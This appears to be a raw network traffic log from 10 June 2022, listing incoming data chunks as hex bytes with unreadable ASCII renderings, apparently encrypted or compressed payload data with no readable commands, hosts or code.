                                                                                                                                                                                        2022-06-10 05:52:17 UTC92INData Raw: 98 79 df fa fd 72 39 d2 0b 7d 5d 54 f2 3f d3 1c b5 38 3c ae 57 34 13 30 1c a5 b5 d0 01 8f c0 c6 d4 08 85 10 a6 b1 28 0e 84 14 bf b7 77 b0 61 4f 81 32 af 5f 6e 05 20 3d 49 10 0a c9 29 b3 a2 a9 e6 de f2 22 76 98 f6 19 6b da 3b a3 79 c3 0c d4 97 a3 08 b5 cf 4f 99 a6 40 3d c8 3a 42 ed 3f c2 9a 73 1d 15 71 5a e7 dd be 3f 89 15 36 7c 73 16 5b 9f 1b 5e 47 08 4e 0b 12 16 49 ca 1d 84 51 94 4d dd d4 31 60 96 27 98 7a 1c 81 89 f3 e9 91 c3 9f a2 55 22 c5 e9 85 4e 64 cc 8b 2b 26 da 99 be 67 9f 22 24 7e f1 50 50 f9 03 0f 64 42 27 0d 66 d5 82 e0 c9 9a c3 78 39 90 f7 cd 7a 5f f9 56 7f 89 41 c4 ba ab dc ec c9 a1 6f 82 fb 40 9b 28 37 78 89 d2 1a 97 cd 9b f5 4e 2a 20 48 8e 07 68 8f 66 c3 c8 88 31 69 f1 c5 e0 43 57 29 7f 05 1d 7e 45 a0 ae 5c 8c b3 cc 26 c2 44 1e 2e 32 bf 5d
                                                                                                                                                                                        Data Ascii: yr9}]T?8<W40(waO2_n =I)"vk;yO@=:B?sqZ?6|s[^GNIQM1`'zU"Nd+&g"$~PPdB'fx9z_VAo@(7xN* Hhf1iCW)~E\&D.2]
                                                                                                                                                                                        2022-06-10 05:52:17 UTC93INData Raw: 16 4f 86 4f 2c 07 d2 36 8f 20 da e9 84 f1 d4 26 d0 b3 84 eb 01 eb 6a e1 68 d1 8d 99 68 e9 00 72 fd 6b ca 45 d1 41 53 ff f7 fe f8 5b ba 1b 10 8b 88 75 db 0d ea d0 66 9b 1f ed 4d 73 19 58 a8 63 86 a1 04 56 91 2f 85 b9 6f bb 9d 6f 4d 82 c9 2c df dd 50 46 0b 69 d5 54 0d ab 63 ab 13 1a 88 83 1b f5 80 fb 42 db 58 38 68 96 18 ec e8 02 6c 5c 40 b8 3f 4e d3 0d 80 45 8e 52 c6 0e 73 b8 ee 23 cd 26 e4 04 66 68 50 b5 cb 2a 63 66 a6 dc 4c 3a 5b 3e 34 62 2e 54 0c 0e 35 a5 c8 2d dc 05 55 05 25 f7 1c 83 a3 84 aa 38 79 68 b3 3d be eb a1 ad 5e 05 5c 9e b8 21 29 95 c7 f7 91 4d 84 10 48 de aa 7e e6 10 6f b6 b2 c4 cc 52 57 54 51 46 b0 79 5c 87 b8 8a 00 99 c6 87 8a 48 0d 21 e3 10 02 a6 d0 71 a7 1c f5 a9 50 84 29 5d 95 c5 3d f3 90 9e f0 79 46 7d f2 69 34 91 93 d8 00 01 3a eb b8
                                                                                                                                                                                        Data Ascii: OO,6 &jhhrkEAS[ufMsXcV/ooM,PFiTcBX8hl\@?NERs#&fhP*cfL:[>4b.T5-U%8yh=^\!)MH~oRWTQFy\H!qP)]=yF}i4:
                                                                                                                                                                                        2022-06-10 05:52:17 UTC94INData Raw: 7c dc 04 cd f1 05 90 6b ff 5a 25 95 a6 b6 05 7f ba 6f 14 e8 69 c8 94 7a ca 1b e9 52 3e 01 92 c9 40 44 b6 29 f0 55 f3 d2 d8 ae 5e 82 39 a5 5d b1 f1 db 8a 8e 9a 7e 8d 33 35 4c 0a 90 e3 d2 36 3e b6 ea 8b 2b d0 60 a3 61 13 0c bf 01 7d bc 5b 88 3e 61 28 c9 d8 d7 0c a1 e1 23 ba 8c c5 c1 f6 55 3b 3a 10 4c fe c5 3f 6e e7 b0 f8 f3 ce d1 f5 8c 9d 5b b7 b4 bf 50 10 52 ec e2 50 26 de 48 cc 4c 42 f1 41 c9 68 b6 4e bf 18 a3 45 a8 c6 92 c2 d1 07 e1 a4 d9 a0 98 0e 3a a3 5b fa 92 ec 4d ae eb 89 6a 2b f5 25 cc cd 0d 69 4d 7f 4d 2a 39 06 0e 86 88 15 0a ec 27 19 05 c3 d8 01 94 6b ee d0 63 f0 63 16 5a 94 c2 f3 83 25 1f 32 32 56 3c 4d 3c 8c da 3d 73 be 4c 3b b4 d2 1d 6f a3 c0 ab ec 7a b7 6b 88 83 fe 8e 82 27 50 be 77 31 94 af a2 b7 98 e6 2c 4e af 1d 18 7c 8b 47 65 b2 37 57 ea
                                                                                                                                                                                        Data Ascii: |kZ%oizR>@D)U^9]~35L6>+`a}[>a(#U;:L?n[PRP&HLBAhNE:[Mj+%iMM*9'kccZ%22V<M<=sL;ozk'Pw1,N|Ge7W
                                                                                                                                                                                        2022-06-10 05:52:17 UTC95INData Raw: c4 a3 b4 3f d7 6e d5 44 b0 a3 d8 11 ff 4c 94 dd e0 6e 49 6f 33 4f 7f 10 a0 d2 60 8d 40 b6 6d 8f a9 48 5c 7a 69 69 7b 0d 45 00 d1 51 10 12 be ad c4 f9 5d ed 2b ca 1f fb 50 9d e6 71 61 bc 4f a9 3a 9f ec ff ba af 8d e4 e1 a1 95 cc 7a d4 8c 9d 0b fa 2a 97 62 df 2b a0 f9 9e 76 f8 0d b7 bf 7f 13 a2 07 68 f0 b5 61 5b b0 5b e6 e7 7f 13 04 cf a3 46 47 00 d7 09 6d 02 9e 1e ad 46 01 a2 56 76 5e 33 39 e1 1b ad aa 9a 90 b9 aa 67 ff 85 72 65 e5 94 5c f4 73 94 3b 2b b1 8a 9e 5a ba ed d9 2a 0e 18 0f 43 05 91 57 a2 46 43 dd 62 81 c5 eb 6f cd 2d 6d 8f 87 8c 1c db 63 15 0b 4d 6d 6d cb 66 80 c6 f1 96 b4 6e e4 f3 57 93 e0 a0 8a 74 d9 26 e6 8f 67 3b 49 0f a1 f2 5b bb d9 3d af 40 65 46 0c c9 e1 16 5b 24 c4 91 54 94 d7 b8 62 21 5c 57 fa b2 30 f4 90 65 32 9f 34 73 d9 94 bc 27 14
                                                                                                                                                                                        Data Ascii: ?nDLnIo3O`@mH\zii{EQ]+PqaO:z*b+vha[[FGmFVv^39gre\s;+Z*CWFCbo-mcMmmfnWt&g;I[=@eF[$Tb!\W0e24s'
                                                                                                                                                                                        2022-06-10 05:52:17 UTC97INData Raw: ce d5 fe 30 5d 80 a6 f1 e0 60 64 77 06 d5 e2 4c 2d 03 af 83 fd 15 27 1d 20 b1 6b db 0d 63 21 5e 81 ca 25 34 58 1b ed e0 04 f1 9c 96 e5 39 82 85 8f 93 bc 97 02 c2 43 88 3c 2f e6 7c 9a 64 d4 c1 bb 48 4c 36 0a 61 98 a0 71 8b cd 7c 48 16 3f 8d dd 56 9a f9 f1 82 b1 b4 6f fc 9d d5 43 c9 f1 8f 80 9a 92 75 a6 40 80 10 47 ca 7a 18 41 d4 b2 55 29 e2 bb a5 30 f5 c6 43 34 89 b6 70 88 83 3d 3f 74 4d 4e 4e 16 90 4c c5 14 ef 93 70 c1 4a 88 7b 56 bf 5a 7d 1c f6 c0 ab a3 ca f1 92 c8 59 10 62 c6 6a 11 39 45 f6 fc 44 e4 4d c7 89 9a e5 71 3c a4 1c 26 0a 2e 7f 42 50 cb 37 70 c6 05 9a 97 bd ca fb ac fc 74 c5 00 9f 3e b1 80 70 e6 e7 d3 93 e7 a9 23 ee a9 3d e0 d9 dc 81 2b 4d dd e0 67 eb 42 fc ae 1d fd 0a 95 ad 86 72 2b 68 61 c5 83 78 4d 47 a5 78 16 a6 af bd 4d 19 57 2f 4f 52 bd
                                                                                                                                                                                        Data Ascii: 0]`dwL-' kc!^%4X9C</|dHL6aq|H?VoCu@GzAU)0C4p=?tMNNLpJ{VZ}Ybj9EDMq<&.BP7pt>p#=+MgBr+haxMGxMW/OR
                                                                                                                                                                                        2022-06-10 05:52:17 UTC97INData Raw: 4a 37 10 fa 7c 87 96 d1 b5 54 0a 96 18 7c 5e ef 4f 55 e3 5c e4 7c 98 12 03 e2 88 2d cf 2c 4a cc 55 43 b3 b5 85 97 68 db 87 31 d0 b7 2e 54 be a1 07 7a ad 07 a3 ce 93 fb 48 60 a3 69 74 de 68 69 1f 0f 49 79 e6 7a 05 50 99 67 7e 81 90 68 0c 02 ae 8e 95 a1 d7 49 8f fd 07 ed 74 c9 ba 83 f6 a9 6d ce 08 a4 11 b5 2f 49 2b f9 88 54 f9 56 2b f4 49 db 85 8a 35 17 eb 1e eb 31 68 3d 3f 2e 46 91 02 b3 6b 0d 5a db 6f 8c 26 0c 25 bb 60 b7 32 13 1f 29 40 1e f0 cd 1e 8f 17 95 a3 b7 3b ed f0 4d 11 46 e8 40 6b 04 81 90 cb b4 f0 0e f2 a4 8d 07 cf 21 df 4e 37 2c 75 23 78 f3 2f d9 a1 86 e8 27 1f 66 0e 7c 64 40 6b 9c 86 b2 6d 68 56 60 ae 4e bd 41 5a eb 9b 6f 5b b8 e7 17 a8 9e 47 fd 2f 84 34 f4 00 c4 24 ee ee 10 9b bd 6e 6a 35 33 a6 a3 26 d5 a8 99 46 25 2a ff 24 9d c7 89 78 f0 d7
                                                                                                                                                                                        Data Ascii: J7|T|^OU\|-,JUCh1.TzH`ithiIyzPg~hItm/I+TV+I51h=?.FkZo&%`2)@;MF@k!N7,u#x/'f|d@kmhV`NAZo[G/4$nj53&F%*$x
                                                                                                                                                                                        2022-06-10 05:52:17 UTC99INData Raw: da 61 e4 dd 0e 70 a3 0e 10 e8 c1 2a c6 96 a1 56 4b c9 5f e9 fc f6 68 ce 76 4d 50 1d 1f 7b 83 35 2f 21 91 58 9f dc 90 48 14 69 b5 59 91 d4 4f af dc d2 c2 50 a6 6c 23 e8 12 77 12 f9 ae 88 4c 6a 85 84 5a c4 28 39 87 ac 12 59 91 ac 8d 5f 20 65 2b d3 ae fa 4a ca 98 43 3a 20 b4 fd 98 73 5e b5 93 56 d1 fa 62 0c 9c f6 86 a2 7a 6d c8 57 80 0d c6 c7 98 9f 82 a4 35 c9 e0 81 5d 2d 7e 00 1d 7e 45 a0 c6 b2 41 e9 68 cb 85 38 81 a8 32 24 3a 55 7f 4a 2d ef 7d 42 70 75 db 6b 4b 47 46 6b 3e 77 b8 68 51 6c 68 3c 9f ea 55 4e db e9 4a 93 f0 9e d5 f5 14 a3 19 6c 7c 12 18 69 9f a8 fe c7 fc 93 31 fc ae 42 fb a8 0b 65 7b 6e a6 fa c5 9b 14 6b d8 31 46 9d 5d 04 1f 4f d9 f0 02 c7 ec 34 32 dd 27 b9 7f 4d 15 18 22 60 1f 35 9c 6d 37 4e 96 b2 79 e1 44 9d 78 2b 4d fb 2a d7 7f 2b 8f 52 2d
                                                                                                                                                                                        Data Ascii: ap*VK_hvMP{5/!XHiYOPl#wLjZ(9Y_ e+JC: s^VbzmW5]-~~EAh82$:UJ-}BpukKGFk>whQlh<UNJl|i1Be{nk1F]O42'M"`5m7NyDx+M*+R-
                                                                                                                                                                                        2022-06-10 05:52:17 UTC100INData Raw: ad b4 09 f0 0e 60 94 40 46 f9 20 e8 6e 88 df c0 fe 3b b5 bd aa 46 d9 bc 54 04 c5 79 0a bb 47 64 43 4f 25 a9 d9 4f d2 56 8d 63 68 34 0f 6e 37 4e 30 fc 87 2d ba 98 78 0e e7 8b 2c 32 65 2e 26 f4 50 35 73 11 0a 82 89 2f b1 b8 ac bb f5 e4 06 a9 8d 9f d6 32 86 8e 8a 05 e2 77 89 58 93 05 a6 06 12 99 63 f8 8a f8 2d 89 f0 e0 f9 97 d5 17 32 37 97 98 53 f3 26 15 58 33 39 cb af ba 4a 87 1d 4b c2 3a 0a ea 38 e8 e1 14 68 d6 6c 22 b2 56 4f c1 15 6f 3a 19 51 38 32 7c 77 5b b4 3f 16 2a 36 12 5e 0f 25 f6 48 fe d3 07 67 ef 3a a3 fa 1d 3f e9 77 a1 b4 af c3 22 4a 34 f5 bb 35 9d c9 88 00 f4 d1 1d 0a 66 1e 88 aa 27 e4 7e e7 1f 54 02 6b da fa f1 4d b5 d2 d0 b0 f0 d7 89 2e a1 3e 88 65 39 da 65 ca b3 a2 07 07 bb 81 43 39 ad 76 35 1b d6 71 81 43 9d 96 50 a6 38 4f e0 52 4d 14 62 4b
                                                                                                                                                                                        Data Ascii: `@F n;FTyGdCO%OVch4n7N0-x,2e.&P5s/2wXc-27S&X39JK:8hl"VOo:Q82|w[?*6^%Hg:?w"J45f'~TkM.>e9eC9v5qCP8ORMbK
                                                                                                                                                                                        2022-06-10 05:52:17 UTC101INData Raw: 80 3e 79 d8 e2 39 c7 8d 51 05 3c ad 88 fd 04 61 ba e5 a8 77 38 e7 db 6d 1e 78 39 2d 88 a6 1f 63 7e 39 a0 a0 6e 36 c6 59 1e 8b 71 52 81 c6 07 34 27 c7 11 1b 7e cf b9 ce 34 b5 45 a5 39 a8 59 50 6e 04 58 a2 bd f1 07 e0 61 e4 a1 98 b0 b5 a0 17 ea b3 50 96 3e b6 e0 83 0d 1b 34 98 9a 87 22 89 c6 45 7d 0f 2a 6b 56 74 ac 1c 32 61 49 24 94 0c d5 72 d4 3e 6e fa 7a 64 e8 b6 e2 c3 62 4d b1 f9 88 42 b2 54 a1 f0 6a ef d2 d8 60 eb b4 7f 3a ec cc 1a 65 3a eb df 9a d4 82 73 94 7a e4 67 bc e8 b2 43 34 35 db a2 4a 6c 04 6e 1c a6 b9 63 7d 8d 82 5e 49 dc da 15 76 fe 3c 37 25 bb 66 0d 0e 63 45 55 23 c8 6f d2 9b 18 09 93 9f bb 13 d2 ab 26 30 ef f7 31 47 35 fb 6c 89 a3 61 d9 05 26 22 19 3f e3 5a 8a 6b 3d d9 51 3c 91 f3 b8 e2 48 4b 1a e5 8e 5b 3a 93 92 27 65 cd 05 3e 38 e5 f7 d6
                                                                                                                                                                                        Data Ascii: >y9Q<aw8mx9-c~9n6YqR4'~4E9YPnXaP>4"E}*kVt2aI$r>nzdbMBTj`:e:szgC45Jlnc}^Iv<7%fcEU#o&01G5la&"?Zk=Q<HK[:'e>8
                                                                                                                                                                                        2022-06-10 05:52:17 UTC102INData Raw: 5a bd bc f7 81 41 57 90 fa 30 a0 fd 81 7e 56 dd 6e 89 34 1d 5b 60 b0 75 34 dc d4 75 5b d2 39 74 2f 07 94 74 0f f6 24 dd dd 9a 82 ad 7e c8 eb 1a 44 dd 6f 07 c0 43 d6 60 da 11 6e ef 30 2c 91 3e 16 d1 60 2f 20 8d 1a 0a 3b a9 87 af d2 a4 8d 1e 30 bc 29 07 83 05 fa 63 82 5c 7a 46 e5 a9 ac 98 93 98 f1 b6 02 78 a3 d9 46 61 62 7f 5a 9f 1a 34 c0 03 ca 71 77 53 19 c6 81 a5 f3 c8 3e b2 38 0c 20 b5 76 2e cd 7a bf 72 98 a3 0b ea 99 17 e6 db a6 f2 76 4f 6c 73 45 55 a9 1b 76 1b b8 49 34 3b d8 b4 8f ef 2e e3 20 50 d6 4c e5 d8 04 39 2a 84 cb 15 20 e3 67 d2 59 2f 71 a7 00 2f 62 2d 0f 05 fc 10 68 d6 87 21 ca 71 01 5f f1 cb 88 7a e3 c0 d8 00 c3 fe 4e af d7 fe 1f 4b 27 7c 1a f7 91 90 f6 ca 04 3f 28 48 b1 1e 3c 19 19 2a 0a 0d fd c6 64 2d 3b f4 25 7d 8d bc eb 36 ee d5 fb 33 0e
                                                                                                                                                                                        Data Ascii: ZAW0~Vn4[`u4u[9t/t$~DoC`n0,>`/ ;0)c\zFxFabZ4qwS>8 v.zrvOlsEUvI4;. PL9* gY/q/b-h!q_zNK'|?(H<*d-;%}63
                                                                                                                                                                                        2022-06-10 05:52:17 UTC104INData Raw: f1 b9 ac 38 5a f5 c4 88 e4 d8 dc 72 8e 51 83 34 26 1a 77 a6 4a 31 5b bb 53 d4 28 a4 11 42 88 7b 56 d7 54 79 44 a5 69 70 37 ab 5c 97 d3 df 8d b2 49 ba 34 5f d4 82 ef 44 ec 55 2e 3e c3 1e ba 7f e0 10 a6 da ba c9 f8 2f 38 a2 d8 b2 3a 10 5c 7d 0e 52 c7 88 1a 41 9b bd e5 81 f2 c7 18 32 a9 87 65 17 e7 89 a6 92 2e 5f ec 3d 28 2b de 5a 52 df 35 b9 de 14 c6 f8 bf e9 16 47 ca 61 30 46 43 05 35 90 8d a1 cc da ee 86 88 15 0a ec 08 89 63 20 a7 5f ca 58 2e ff fa 96 80 15 97 c1 49 1f 74 c0 00 3f fb 00 f2 56 93 10 10 8f 48 c2 37 0f 60 21 12 f6 96 e9 80 f6 41 cf c3 43 33 45 4c cc 88 6b d1 a7 a0 a4 d3 98 a8 70 12 1e 12 fd b0 11 9e d3 b2 aa 23 c1 04 02 1f b8 38 7c c3 6b 88 11 38 03 14 2a df f0 67 ef ef b3 ec be 0d 8b a3 c7 e9 cd 78 ed 69 2c 9c a6 cd a3 82 b7 23 a8 80 66 a8
                                                                                                                                                                                        Data Ascii: 8ZrQ4&wJ1[S(B{VTyDip7\I4_DU.>/8:\}RA2e._=(+ZR5Ga0FC5c _X.It?VH7`!AC3ELkp#8|k8*gxi,#f
                                                                                                                                                                                        2022-06-10 05:52:17 UTC105INData Raw: 70 3a 1a ec f0 90 ee 23 9c b3 88 26 89 7e 9a 72 78 36 38 c6 96 67 06 bd ff 71 3c 11 20 53 82 41 90 b4 bb 12 f2 47 2b b5 25 7c d4 64 1c a9 e6 cc 46 ce 36 51 61 32 e3 96 50 18 3d be 29 0f 93 7a 11 8b 47 2a 4c 97 28 9d ab ed ff 09 60 b6 c2 67 26 2d 67 a1 96 8c da 41 89 67 1b 6b b0 6b b5 b1 8f 9a 52 a3 83 d1 d6 d6 0b 17 99 d2 aa 2c 8f 50 6a 79 30 81 5d bb 98 54 8a 6f 8a c6 1a c9 ce 63 ac e1 37 c7 50 aa 74 77 a8 0c 26 20 06 d9 ea b7 e9 cc 95 11 d0 26 0b ad b9 c9 f0 08 da 27 2f 1e 67 7a 46 68 a4 91 4d 6e 6a 04 41 ce 3c 72 09 3e 2b 90 94 d0 9c 12 67 4d 56 c2 a0 3a d2 92 b8 3b 52 c9 0f 77 09 88 30 3c 38 6b 5b 11 b7 d5 55 90 0d 1c 86 5f a4 da 50 e3 61 bb e5 bf be 5d 6e 00 6e 3c 4b 5f cf 86 cc 4d 4b b5 57 12 89 ad 05 93 96 69 55 33 01 90 c3 0f 11 71 0b a3 c9 43 2f
                                                                                                                                                                                        Data Ascii: p:#&~rx68gq< SAG+%|dF6Qa2P=)zG*L(`g&-gAgkkR,Pjy0]Toc7Ptw& &'/gzFhMnjA<r>+gMV:;Rw0<8k[U_Pa]nn<K_MKWiU3qC/
                                                                                                                                                                                        2022-06-10 05:52:17 UTC106INData Raw: a8 1b 80 cf 5f 45 43 bb ab 15 14 4b bf 06 6c 8b af 6d 3a d0 2e 57 b0 a7 59 5d ed c8 26 17 7a b9 b6 9d 7c 17 22 61 8b 6d f3 0b 62 fb 93 04 5e 3c 42 ec 0a 3e c1 10 cb c7 f9 b0 c0 09 ee 86 31 75 aa 2a a7 dc 82 5a 37 1b 9e 2c de 33 a2 c4 48 20 31 8b cb fa 28 59 31 71 93 5b ae f2 2a 0a c5 68 41 d2 78 16 b4 85 93 17 06 fe 09 93 ad 54 f9 1b bb e5 f6 e3 a6 b6 d9 4e ed 55 7c 04 95 3b 76 4e a2 2e 7b c7 1e 7a af 09 30 1f cd d1 89 c3 90 d9 3e 27 3a 7c 0c 37 ab f3 fd 52 e2 7d 16 40 ac 29 56 31 81 18 4e 07 9d b1 20 65 a0 4e 6e 96 29 95 9b 26 7c 57 68 44 b4 7a c9 20 eb ac e8 9c 51 d3 c9 96 86 88 b9 bc 1b 0c 42 c4 93 dc b1 8b 86 76 ea 60 fe 2b 1b a6 a6 f3 8e 72 a7 d1 e1 fb 42 b7 93 aa 29 8c a7 ff 36 dc a0 30 ac ba 8a ff 0b 93 31 ac 92 94 c3 0a 3b c6 bb d8 fa 33 69 39 6e
                                                                                                                                                                                        Data Ascii: _ECKlm:.WY]&z|"amb^<B>1u*Z7,3H 1(Y1q[*hAxTNU|;vN.{z0>':|7R}@)V1N eNn)&|WhDz QBv`+rB)601;3i9n
                                                                                                                                                                                        2022-06-10 05:52:17 UTC108INData Raw: b5 c2 ae 23 7f e3 2a e1 d2 2a b7 b7 37 09 b6 32 ff de d5 1f 71 26 57 33 ec 58 61 49 cb 63 31 c3 f6 c9 80 e0 60 ba 1d b5 b8 b8 99 86 b5 f3 2b 12 77 d1 e3 08 29 2d 81 0f 51 a6 c0 96 3b 8d 6a 85 eb 89 3b c8 40 68 fa 71 39 f1 53 05 e1 66 66 2c 0b 0e 54 a1 7e fb bd b9 bf 7d a4 49 3a 60 96 8a 37 98 61 0d b0 19 c4 d0 1a 16 05 0a e6 6a 4a 51 c5 9c 28 14 99 41 77 64 ce d1 14 95 e9 e9 cd 87 1b 38 38 2e 8e 26 e3 29 31 77 43 25 e4 08 d1 a0 25 ea 26 41 32 4e 06 c7 5f 89 86 6a ef a6 7a 02 1a 68 76 ac f3 f8 b9 56 20 4d f4 6b e5 71 12 07 1f 69 96 28 69 87 dd 8b 55 5a a1 37 bb a0 04 08 cf fa 6c 31 18 5c a3 cf 13 f0 da d3 6e e7 b0 36 0c 7e c8 1b 4e d5 47 ee 07 98 42 38 19 53 bd 39 7a a6 68 aa f8 63 30 75 85 b9 eb e1 a5 a8 c6 7a 0e 35 4d ac 79 6f 26 d5 24 6b 5a b1 1e ee 18
                                                                                                                                                                                        Data Ascii: #**72q&W3XaIc1`+w)-Q;j;@hq9Sff,T~}I:`7ajJQ(Awd88.&)1wC%%&A2N_jzhvV Mkqi(iUZ7l1\n6~NGB8S9zhc0uz5Myo&$kZ
                                                                                                                                                                                        2022-06-10 05:52:17 UTC109INData Raw: f1 94 70 8e e9 b2 93 69 a6 09 d5 a6 68 1f 02 72 e1 60 36 8a 4b 11 33 4b 6c 3b ae 1c c2 37 c5 3e ef e5 f3 28 f4 ec 26 e3 48 2f 16 5e a7 fe e6 0d 2c 47 83 40 fa a7 01 bf 61 df 84 57 79 df 60 4b a6 79 2f 53 3a f3 9e aa 99 e5 c0 d2 f5 2c 70 a9 9c 07 17 dc b7 70 74 7f 6d 29 d0 62 12 b1 3d 05 58 e5 43 3a cc 7a cc ac cd f7 0d 70 6b 8b 86 fc 98 51 e6 98 d2 71 65 a3 bf 53 75 1c 2f 41 7c 9a 9a 71 7d 59 1d 12 13 d4 42 f0 04 09 02 a5 a9 61 d3 e2 60 1d f9 1e 24 d9 57 27 15 5c 76 39 ad 14 9e 62 0e 34 e3 c5 46 75 8a ec 53 3e dc f0 ba 34 44 fe 72 e3 13 26 37 be 67 c0 0b d4 f9 47 42 ba dc 6c 40 95 94 df b1 5d cf 26 88 1c 79 a3 6a 5d b6 b1 ea 1e 55 5b e6 38 20 38 3c 41 8d 46 9a 5c f0 4b 79 a8 08 ea 52 1c 9f 6b 63 a0 38 18 0a 22 66 80 2d da 3e 80 00 e7 43 2b 8f a3 d8 a4 80
                                                                                                                                                                                        Data Ascii: pihr`6K3Kl;7>(&H/^,G@aWy`Ky/S:,pptm)b=XC:zpkQqeSu/A|q}YBa`$W'\v9b4FuS>4Dr&7gGBl@]&yj]U[8 8<AF\KyRkc8"f->C+
                                                                                                                                                                                        2022-06-10 05:52:17 UTC110INData Raw: f1 18 32 1f 45 c5 92 47 53 8c 9f f8 81 6b af d6 5f c6 6a a3 aa 65 9a 6b 36 19 3f cf 85 84 c6 d1 76 25 29 10 36 0a 2b 1a 1b e5 66 38 30 b9 0e 4a 91 40 dd b5 6b b3 8a b8 97 8a 59 53 ab e4 3c 3b 59 28 d7 6e 67 10 01 f8 2e 73 26 9b 8c a3 a1 d0 a1 e2 a8 f9 bc ec f9 3b b7 ae 56 e1 7c dc 26 c4 08 82 0c df 32 ba de 5f de fb 3e 39 e2 fc f0 f0 01 04 ef a1 a1 2b 0a 97 0a 3d 45 4f 3c 62 01 33 f6 3f 16 0f d0 fb 52 69 d2 88 70 46 75 e0 90 9f 24 55 ac 6b 33 ed 90 0b 0d 44 7d 66 03 61 f7 96 17 2f 4e af 5b 9f 7a 34 cd cf 35 48 8e cf d0 4b cf b8 53 49 2f 62 51 ce a0 20 9d 75 9e 68 39 ee a1 9f d0 7e fd 4e 49 c7 2a e1 2b 72 ad 95 93 de ce ce 76 e8 5a d1 f8 61 eb 8e c2 84 58 e1 e3 d4 06 6b 26 25 b5 e5 65 ec d5 16 37 a8 e8 ef 6e 09 e0 a4 d2 5c e5 5a 0b 94 27 d4 f3 c4 bb 5b 1f
                                                                                                                                                                                        Data Ascii: 2EGSk_jek6?v%)6+f80J@kYS<;Y(ng.s&;V|&2_>9+=EO<b3?RipFu$Uk3D}fa/N[z45HKSI/bQ uh9~NI*+rvZaXk&%e7n\Z'[
                                                                                                                                                                                        2022-06-10 05:52:17 UTC111INData Raw: 29 f3 b4 e2 f2 15 36 9d ad 72 09 9e 03 ad 55 db 6d a4 7c 64 17 2a 70 a6 4d 58 4e ee 80 b2 f0 e9 1e 09 0b f6 4f 16 81 58 a2 c0 37 5e ad 69 f2 5a aa 1d 49 a5 7f 07 86 55 f4 bc 0e 3a a6 71 dc ed fa fc fd f5 30 26 64 71 01 e9 6c c1 44 42 37 ad 9a f1 5c 3a 94 ee 72 f1 7c 36 87 4b cc 14 55 85 ff ef c3 f9 c9 9e 6f 10 61 fd 9d 13 a8 ad 0f 48 3f 0e 5e aa fe 3b 69 aa d2 1a a2 2a 51 d0 e1 6a 4c a0 9d 2b 54 8c 4b b6 61 2f 5e 26 2e fa 3a 37 f5 c3 0f ba 11 25 f4 5f bb 68 05 ae 35 ff 93 6d 39 c4 62 1f a5 e0 22 4d 37 0a 9e f2 f8 99 bc cb 2c a0 aa 3c 00 88 25 9d b6 bc 83 9b 39 22 04 38 45 53 9b f1 9f 9c 41 54 7f a7 43 f2 94 27 9d eb 12 63 14 1c 11 c1 30 0b 77 1d af 89 5b af 35 57 37 0d 5c 7b 39 70 70 19 f7 97 d6 cf 33 97 2b 81 7f 77 64 8f 7b 56 34 54 e2 72 ee 13 fb 10 a7
                                                                                                                                                                                        Data Ascii: )6rUm|d*pMXNOX7^iZIU:q0&dqlDB7\:r|6KUoaH?^;i*QjL+TKa/^&.:7%_h5m9b"M7,<%9"8ESATC'c0w[5W7\{9pp3+wd{V4Tr
                                                                                                                                                                                        2022-06-10 05:52:17 UTC113INData Raw: ec 9a 1d 2a 4b 27 bd 37 46 57 6c ee d2 f3 e2 b6 7e 3b 6d 9f 55 2c 31 cc 5f f7 f4 45 55 8d 6f d6 b2 b2 d3 98 a1 75 5c b5 06 08 d0 45 7e e5 62 09 f4 4c 47 1f 8b bf 1a 70 fd 3c a2 79 60 bd dd 58 9d ba aa 18 2f 0d c1 73 90 9d 6d 0a 93 8e 11 04 32 b0 ee 5a 98 2c 12 9c f9 67 7e b8 95 62 d8 dd 65 91 c9 81 58 7b ab d8 51 93 76 74 d7 72 a0 2a e4 48 99 07 6e c5 c5 cc bb 97 ee c1 52 73 65 85 6a 9d e5 44 4d 3c 05 65 7f 6e a5 29 af f2 7b ea 6d 1c 64 3e ff 49 ea d4 48 63 18 e1 8a 25 9e aa d3 6d 0a 44 4e 25 bb b0 21 b7 04 9c 5b 89 29 db 98 74 db 4d 88 df f3 06 d8 4a a3 0d 5f a0 ed 46 e0 57 ab 60 17 f0 9e 25 04 8f 3b 90 6e 5b 45 90 2d ca 9c 02 e4 ae 28 0d 43 bd 00 99 0c 63 d6 1f a4 19 d3 ec c8 f7 9f 2b 78 f7 c4 16 24 89 5e ec cf 32 48 d7 39 2f b4 2e cf 29 95 82 9e 27 7c
                                                                                                                                                                                        Data Ascii: *K'7FWl~;mU,1_EUou\E~bLGp<y`X/sm2Z,g~beX{Qvtr*HnRsejDM<en){md>IHc%mDN%![)tMJ_FW`%;n[E-(Cc+x$^2H9/.)'|
                                                                                                                                                                                        2022-06-10 05:52:17 UTC113INData Raw: 1b 7e 8c 56 0c c2 5f c3 f7 d0 6c 9b 08 18 fc 71 d0 20 57 90 17 f6 48 cb c1 a6 26 1e 4a 84 28 be 46 82 ed 67 d3 04 c9 5d 9c 26 e2 37 b2 d8 6a 41 ed dc 73 ce e4 e6 7f 65 45 2f db 2d cf 26 5b 2f 05 7a 7b 36 92 62 5c 8b f2 1b 1c 43 38 bf 8c 1e ac 86 37 8f 47 43 71 1d 9e 82 b3 d3 13 56 4d cb 43 b4 c4 7c 92 e0 15 5e aa 41 10 12 88 26 9e aa cc 96 c0 49 1f 8d 4d 46 9c 70 c6 ac 56 3e 41 58 9c 17 78 e6 28 61 73 92 f9 cf 5e ce c8 81 91 c3 e3 96 89 ae 0f 62 af be 6b 27 6a 1d 3d d6 71 30 b1 4e f3 03 e1 60 8e 71 1f 82 48 38 65 92 44 93 73 a0 70 e4 cf 5f 6e 7b fe f6 a6 ec c9 a9 b3 d2 98 82 80 a3 4a 3a 8f 7e fa 21 4d 9c f6 88 e2 42 c0 99 bb 05 4e 77 c5 97 29 bd 0f 68 0a e8 30 5d 21 4a 1b 1b 97 5f 60 5a 9d f9 ae 47 53 d9 06 41 cf 67 f9 3e d8 9f 76 28 64 a5 9a 63 32 cd ab
                                                                                                                                                                                        Data Ascii: ~V_lq WH&J(Fg]&7jAseE/-&[/z{6b\C87GCqVMC|^A&IMFpV>AXx(as^bk'j=q0N`qH8eDsp_n{J:~!MBNw)h0]!J_`ZGSAg>v(dc2
